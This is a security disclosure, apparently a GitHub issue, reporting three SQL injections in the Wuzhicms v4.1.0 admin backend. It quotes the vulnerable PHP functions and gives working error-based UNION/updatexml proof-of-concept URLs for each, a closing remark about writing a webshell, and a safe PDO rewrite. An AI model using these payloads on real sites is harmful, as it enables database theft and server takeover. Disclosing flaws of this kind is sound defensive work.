Description
There are 3 SQL injections in the Wuzhicms v4.1.0 admin backend.
one
Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php has a SQL injection vulnerability.
Vulnerable file:
/coreframe/app/pay/admin/index.php, lines 30-98

```php
public function listing(){
    $fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
    $keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
    $payments = $this->payments;
    $status_arr = $this->status_arr;
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page, 1);
    $status = $GLOBALS['status'];
    if ($status) {
        $where = 'status=' . $status;
    } else {
        $where = 'status>0';
    }
    if ($keytype) {
        $where .= " AND `keytype`='$keytype'";
    }
    // strip_tags() only removes HTML; quotes and SQL keywords pass through untouched
    $keyValue = strip_tags($GLOBALS['keyValue']);
    $fieldtype = intval($GLOBALS['fieldtype']);
    if ($keyValue) {
        // $keyValue is interpolated directly into the WHERE string in every branch
        switch ($fieldtype) {
            case 0:
                $where .= " AND `order_no`='$keyValue'";
                break;
            case 1:
                $where .= " AND `telephone`='$keyValue'";
                break;
            case 2:
                $where .= " AND `kf_username`='$keyValue'";
                break;
            case 3:
                $where .= " AND `jxs_username`='$keyValue'";
                break;
        }
    }
    if ($_SESSION['role'] == 4) {
        // customer service
        $kf_username = get_cookie('username');
        $where .= " AND `kf_username`='$kf_username'";
    }
    $starttime = '';
    $endtime = '';
    if ($GLOBALS['starttime']) {
        $starttime = strtotime($GLOBALS['starttime']);
        $where .= " AND `addtime`>'$starttime'";
    }
    if ($GLOBALS['endtime']) {
        $endtime = strtotime($GLOBALS['endtime']);
        $where .= " AND `endtime`<'$endtime'";
    }
    if(isset($GLOBALS['exp'])) {
        $pagesize = 1000;
    } else {
        $pagesize = 20;
    }
    $admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0);
    // the assembled $where string is passed to the query as-is
    $result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC');
    if(isset($GLOBALS['exp'])) {
        $this->export_excel($result);
    }
    $pages = $this->db->pages;
    $total = $this->db->number;
    $pay_config = get_config('pay_config');
    load_class('form');
    include $this->template('listing');
}
```

The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!
POC
/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
two
The second SQL injection is in a different function of the same file as the first one!
Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php has a SQL injection vulnerability.
Vulnerable file:
/coreframe/app/pay/admin/index.php, lines 244-289
```php
public function relay(){
    $id = intval($GLOBALS['id']);
    $r = $this->db->get_one('pay', array('id' => $id));
    $r2 = $this->db->get_one('pay_detail', array('id' => $id));
    $r = array_merge($r, $r2);
    $keyValue = '';
    $keyType = '';
    if (isset($GLOBALS['keyType'])) {
        $keyType = $GLOBALS['keyType'];
        $keyValue = $GLOBALS['keyValue'];
        if ($keyValue) {
            // both the column name ($keyType) and the value ($keyValue) come straight from the request
            $where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'";
            $result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC');
        }
    } elseif (isset($GLOBALS['submit'])) {
        load_function('common', 'pay');
        $formdata = array();
        $formdata['order_no'] = create_order_no();
        $formdata['to_uid'] = intval($GLOBALS['to_uid']);
        $formdata['username'] = $r['linkman'];
        $formdata['mobile'] = $r['telephone'];
        $formdata['pinpai'] = $r['data1'];
        $formdata['chexing'] = $r['data3'];
        $formdata['addtime'] = $r['addtime'];
        $formdata['keytype'] = 0; // guest order
        $formdata['zftime'] = SYS_TIME;
        $this->db->insert('demand_relay', $formdata);
        $formdata2 = array();
        $formdata2['op_uid'] = $_SESSION['uid'];
        $formdata2['to_uid'] = intval($GLOBALS['to_uid']);
        $formdata2['to_username'] = $GLOBALS['to_username'];
        $formdata2['updatetime'] = SYS_TIME;
        $this->db->insert('demand_history', $formdata2);
        // $this->db->update('demand', array('flag'=>1),array('did' => $did));
        $this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id));
        $forward = strip_tags($GLOBALS['forward']);
        MSG('发送成功', $forward);
    } else {
        $uid = $_SESSION['uid'];
        $where = "op_uid='$uid'";
        $data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC');
        $forward = strip_tags($GLOBALS['forward']);
    }
    include $this->template('pay_relay');
}
```

Set $keyType=uid, and $keyValue is controllable.
The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!
POC
/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
three
Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php has a SQL injection vulnerability.
Someone has already submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php (#175), but I found that, in addition to the $flag parameter, the $keyValue parameter can also be injected!
Vulnerable file:
coreframe/app/order/admin/index.php, lines 22-87
```php
public function listing() {
    load_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS['flag'];
    $status = array();
    $status[1] = '待发货';
    $status[2] = '已发货';
    $status[3] = '订单完成';
    $status_arr = $this->status_arr;
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page,1);
    // strip_tags() only removes HTML; quotes and SQL keywords pass through untouched
    $keyValue = strip_tags($GLOBALS['keyValue']);
    $fieldtype = intval($GLOBALS['fieldtype']);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND `order_no`='$keyValue'";
                break;
            case 1:
                // fieldtype=1: $keyValue lands inside a LIKE pattern without escaping
                $where .= " AND `remark` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this->db->get_one('member', array('username' => $keyValue));
                $uid = $r['uid'];
                $where .= " AND `uid`='$uid'";
                break;
            case 3:
                $where .= " AND `snid`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS['starttime']) {
        $starttime = strtotime($GLOBALS['starttime']);
        $where .= " AND `addtime`>'$starttime'";
    }
    if($GLOBALS['endtime']) {
        $endtime = strtotime($GLOBALS['endtime']);
        $where .= " AND `addtime`<'$endtime'";
    }
    $result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC');
    // excerpt ends here; the rest of listing() is not quoted in the report
```

Set $fieldtype=1, and $keyValue is controllable.
The $keyValue parameter is not strictly filtered, causing a SQL injection vulnerability!
POC
http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1
Multiple SQL injection vulnerabilities exist in Wuzhicms v4.1.0.
They allow attackers to execute arbitrary SQL commands via the $keyValue parameter in (1) the /coreframe/app/order/admin/index.php file and (2) the /coreframe/app/pay/admin/index.php file.
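As an added example (not Wuzhicms code), this is how the WHERE clauses that listing() and relay() assemble by string interpolation can be built safely: the column name is checked against a whitelist (relay() takes it straight from $keyType) and the search value is bound through a PDO placeholder, so $keyValue can no longer change the query. It assumes PDO with SQLite and an in-memory table constructed here in place of the real `pay` table.

```php
<?php
// Added example, not part of Wuzhicms. Safe replacement for the interpolated
// WHERE strings in listing() / relay(): whitelisted column, bound value.

const SEARCHABLE_COLUMNS = ['order_no', 'telephone', 'kf_username', 'jxs_username', 'uid'];

function safe_search_where(string $column, string $keyValue, bool $like): array
{
    // Identifiers cannot be bound as parameters, so the column must match a fixed list
    if (!in_array($column, SEARCHABLE_COLUMNS, true)) {
        throw new InvalidArgumentException("column not searchable: $column");
    }
    if ($like) {
        // Escape user wildcards so '%' and '_' in the input match literally
        $escaped = addcslashes($keyValue, '%_\\');
        return ["status > 0 AND `$column` LIKE :kv ESCAPE '\\'", [':kv' => "%$escaped%"]];
    }
    return ["status > 0 AND `$column` = :kv", [':kv' => $keyValue]];
}

function count_matches(PDO $pdo, string $column, string $keyValue, bool $like): int
{
    [$where, $params] = safe_search_where($column, $keyValue, $like);
    $stmt = $pdo->prepare("SELECT COUNT(*) FROM pay WHERE $where");
    $stmt->execute($params);   // the value travels as data, never as SQL text
    return (int) $stmt->fetchColumn();
}

// Constructed stand-in for the `pay` table
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pay (id INTEGER PRIMARY KEY, order_no TEXT, telephone TEXT,
            kf_username TEXT, jxs_username TEXT, uid INTEGER, status INTEGER)');
$pdo->exec("INSERT INTO pay VALUES (1,'A1001','13800000000','kf01','jxs01',7,1),
            (2,'A1002','13900000000','kf02','jxs02',8,2)");

// Constructed inputs: a real order number, a quote-breaking value (matches nothing
// instead of altering the statement), a LIKE search, and a relay()-style column
// name that is refused by the whitelist.
echo count_matches($pdo, 'order_no', 'A1001', false), "\n";
echo count_matches($pdo, 'order_no', "A1001' OR '1'='1", false), "\n";
echo count_matches($pdo, 'telephone', '139', true), "\n";
try {
    count_matches($pdo, "uid` = 1 OR `1", 'x', true);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```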
https://github.com/wuzhicms/wuzhicms/issues/198
Vulnerability verification process: https://github.com/wuzhicms/wuzhicms/issues/198
Use sql injection to elevate permissions and write webshell